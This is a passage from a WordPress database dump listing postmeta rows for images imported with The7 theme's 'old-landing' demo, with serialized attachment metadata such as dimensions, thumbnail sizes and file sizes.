7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3221,1517,'_the7_imported_item','old-landing'),
(3222,1519,'_wp_attached_file','2018/10/art-3-left.png'),
(3223,1519,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1305;s:6:\"height\";i:795;s:4:\"file\";s:22:\"2018/10/art-3-left.png\";s:8:\"filesize\";i:298172;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"art-3-left-300x183.png\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40304;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"art-3-left-1024x624.png\";s:5:\"width\";i:1024;s:6:\"height\";i:624;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:353563;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"art-3-left-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18789;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"art-3-left-768x468.png\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:209901;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3224,1519,'_the7_imported_item','old-landing'),
(3225,1520,'_wp_attached_file','2018/10/art-3-right.png'),
(3226,1520,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1022;s:6:\"height\";i:538;s:4:\"file\";s:23:\"2018/10/art-3-right.png\";s:8:\"filesize\";i:165248;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"art-3-right-300x158.png\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38535;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"art-3-right-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18280;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"art-3-right-768x404.png\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:199011;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3227,1520,'_the7_imported_item','old-landing'),
(3228,1521,'_wp_attached_file','2018/10/art-002-left.png'),
(3229,1521,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:677;s:6:\"height\";i:829;s:4:\"file\";s:24:\"2018/10/art-002-left.png\";s:8:\"filesize\";i:179245;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"art-002-left-245x300.png\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58849;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"art-002-left-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24074;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3230,1521,'_the7_imported_item','old-landing'),
(3231,1522,'_wp_attached_file','2018/10/art-0002-left.png'),
(3232,1522,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:738;s:6:\"height\";i:791;s:4:\"file\";s:25:\"2018/10/art-0002-left.png\";s:8:\"filesize\";i:182849;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"art-0002-left-280x300.png\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:64454;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"art-0002-left-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21928;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3233,1522,'_the7_imported_item','old-landing'),
(3234,1523,'_wp_attached_file','2018/10/art-03-left.png'),
(3235,1523,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1360;s:6:\"height\";i:795;s:4:\"file\";s:23:\"2018/10/art-03-left.png\";s:8:\"filesize\";i:303171;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"art-03-left-300x175.png\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37569;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"art-03-left-1024x599.png\";s:5:\"width\";i:1024;s:6:\"height\";i:599;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:317108;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"art-03-left-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17389;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"art-03-left-768x449.png\";s:5:\"width\";i:768;s:6:\"height\";i:449;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:196224;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3236,1523,'_the7_imported_item','old-landing'),
(3237,1531,'_wp_attached_file','2018/10/logo-slider-landing.png'),
(3238,1531,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:161;s:6:\"height\";i:159;s:4:\"file\";s:31:\"2018/10/logo-slider-landing.png\";s:8:\"filesize\";i:8041;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"logo-slider-landing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9788;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3239,1531,'_the7_imported_item','old-landing'),
(3240,1532,'_wp_attached_file','2018/10/number.png'),
(3241,1532,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:21;s:6:\"height\";i:31;s:4:\"file\";s:18:\"2018/10/number.png\";s:8:\"filesize\";i:1862;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3242,1532,'_the7_imported_item','old-landing'),
(3243,1533,'_wp_attached_file','2018/10/art-mob-slider.png'),
(3244,1533,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:350;s:4:\"file\";s:26:\"2018/10/art-mob-slider.png\";s:8:\"filesize\";i:373591;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"art-mob-slider-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44350;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"art-mob-slider-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32260;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"art-mob-slider-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:230965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3245,1533,'_the7_imported_item','old-landing'),
(3246,1536,'_wp_attached_file','2018/10/live001.jpg'),
(3247,1536,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2018/10/live001.jpg\";s:8:\"filesize\";i:154210;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"live001-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13206;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"live001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6508;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3248,1536,'_the7_imported_item','old-landing'),
(3249,1539,'_wp_attached_file','2018/10/art-01-landing.png'),
(3250,1539,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:710;s:6:\"height\";i:481;s:4:\"file\";s:26:\"2018/10/art-01-landing.png\";s:8:\"filesize\";i:204387;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"art-01-landing-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:73463;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"art-01-landing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35197;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3251,1539,'_the7_imported_item','old-landing'),
(3252,1544,'_wp_attached_file','2018/10/art-03-landing.jpg'),
(3253,1544,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:755;s:6:\"height\";i:574;s:4:\"file\";s:26:\"2018/10/art-03-landing.jpg\";s:8:\"filesize\";i:130755;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"art-03-landing-300x228.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14703;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"art-03-landing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7326;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3254,1544,'_the7_imported_item','old-landing'),
(3255,1548,'_wp_attached_file','2018/10/art-04-landing.png'),
(3256,1548,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:764;s:6:\"height\";i:557;s:4:\"file\";s:26:\"2018/10/art-04-landing.png\";s:8:\"filesize\";i:379831;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"art-04-landing-300x219.png\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87659;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"art-04-landing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36707;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3257,1548,'_the7_imported_item','old-landing'),
(3258,1553,'_wp_attached_file','2018/10/art-001.jpg'),
(3259,1553,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2018/10/art-001.jpg\";s:8:\"filesize\";i:11458;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"art-001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3453;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3260,1553,'_the7_imported_item','old-landing'),
(3261,1554,'_wp_attached_file','2018/10/art-002.jpg'),
(3262,1554,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2018/10/art-002.jpg\";s:8:\"filesize\";i:30302;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"art-002-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7900;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3263,1554,'_the7_imported_item','old-landing'),
(3264,1555,'_wp_attached_file','2018/10/art-003.jpg'),
(3265,1555,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2018/10/art-003.jpg\";s:8:\"filesize\";i:15275;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"art-003-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4565;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3266,1555,'_the7_imported_item','old-landing'),
(3267,1556,'_wp_attached_file','2018/10/art-004.jpg'),
(3268,1556,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2018/10/art-004.jpg\";s:8:\"filesize\";i:21401;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"art-004-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5318;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3269,1556,'_the7_imported_item','old-landing'),
(3270,1558,'_wp_attached_file','2018/10/art000.png'),
(3271,1558,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2018/10/art000.png\";s:8:\"filesize\";i:8017;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"art000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10336;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3272,1558,'_the7_imported_item','old-landing'),
(3273,1559,'_wp_attached_file','2018/10/art001.png'),
(3274,1559,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2018/10/art001.png\";s:8:\"filesize\";i:25385;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"art001-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22732;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3275,1559,'_the7_imported_item','old-landing'),
(3276,1560,'_wp_attached_file','2018/10/art002.png'),
(3277,1560,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2018/10/art002.png\";s:8:\"filesize\";i:30275;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"art002-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21976;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3278,1560,'_the7_imported_item','old-landing'),
(3279,1561,'_wp_attached_file','2018/10/art004.png'),
(3280,1561,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2018/10/art004.png\";s:8:\"filesize\";i:44857;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"art004-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3281,1561,'_the7_imported_item','old-landing'),
(3282,1564,'_wp_attached_file','2018/10/art001-landing.jpg'),
(3283,1564,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:710;s:6:\"height\";i:481;s:4:\"file\";s:26:\"2018/10/art001-landing.jpg\";s:8:\"filesize\";i:103375;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"art001-landing-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13083;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"art001-landing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7211;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3284,1564,'_the7_imported_item','old-landing'),
(3285,1566,'_wp_attached_file','2018/10/pl00-1.png'),
(3286,1566,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:79;s:6:\"height\";i:79;s:4:\"file\";s:18:\"2018/10/pl00-1.png\";s:8:\"filesize\";i:5035;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3287,1566,'_the7_imported_item','old-landing'),
(3288,1567,'_wp_attached_file','2018/10/pl01-1.png'),
(3289,1567,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:72;s:6:\"height\";i:72;s:4:\"file\";s:18:\"2018/10/pl01-1.png\";s:8:\"filesize\";i:3501;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3290,1567,'_the7_imported_item','old-landing'),
(3291,1568,'_wp_attached_file','2018/10/pl02.png'),
(3292,1568,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:72;s:6:\"height\";i:72;s:4:\"file\";s:16:\"2018/10/pl02.png\";s:8:\"filesize\";i:3308;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3293,1568,'_the7_imported_item','old-landing'),
(3294,1569,'_wp_attached_file','2018/10/pl03-1.png'),
(3295,1569,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:72;s:6:\"height\";i:72;s:4:\"file\";s:18:\"2018/10/pl03-1.png\";s:8:\"filesize\";i:3611;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3296,1569,'_the7_imported_item','old-landing'),
(3297,1570,'_wp_attached_file','2018/10/pl04-1.png'),
